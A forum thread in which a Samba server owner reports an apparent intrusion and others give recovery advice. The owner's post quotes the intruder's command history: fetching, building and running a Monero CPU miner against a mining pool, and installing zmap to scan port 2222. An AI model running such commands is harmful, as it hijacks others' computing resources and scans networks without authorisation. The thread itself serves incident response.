Server Compromised ?

Discussion in 'Technical' started by dipeshmehta, May 16, 2017.

  1. dipeshmehta

    dipeshmehta Member

    I have been running an Ubuntu Server 14.04 LTS, mainly for samba as file server. The server runs fine unattended and so I do not need to login to the server for several days. When I logged into the server today, I found some suspicious activity in command history. While searching web for the commands used, I came to know its something about cryptocurrency / bitcoins etc.

    Following I found in command history:
    Code:
    cd /usr/local/games
    ls
    mkdir miner
    clear
    cd miner
    ls
    clear
    sudo apt-get install -y git automake  pkg-config build-essential libcurl4-openssl-dev
    git clone https://github.com/wolf9466/cpuminer-multi
    cd cpuminer-multi
    ./autogen.sh
    CFLAGS="-march=native" ./configure
    make
    ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560
    cat /proc/cpuinfo
    ./configure --disable-aes-ni
    make
    ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560
    
    Code:
    wget https://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
    tar xvf pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
    ./minerd -a cryptonight
    Code:
    apt-get install zmap
    zmap -p 2222
    While checking for log, I found all log files are of 0 size in /var/log and datestamp of November 25.
    As precaution, I stopped port forward for port # 22 on my firewall, and changed passwords.
    Kindly guide, what should I do further.
    ~Dipesh
     
  2. sjau

    sjau Local Meanie Moderator

    If you suspect the server has been compromised, the only thing you can do is set it up anew. You can't trust it anymore until then.
     
  3. concept21

    concept21 Member

    Restore to an older image made before this intrusion happened.
    Then, change ssh login method to Key-only. :cool:
     
  4. sjau

    sjau Local Meanie Moderator

    if one has an image... but then, that older image might have the same security issue... I still recommend to re-setup everything.
     
    Last edited: May 20, 2017

Share This Page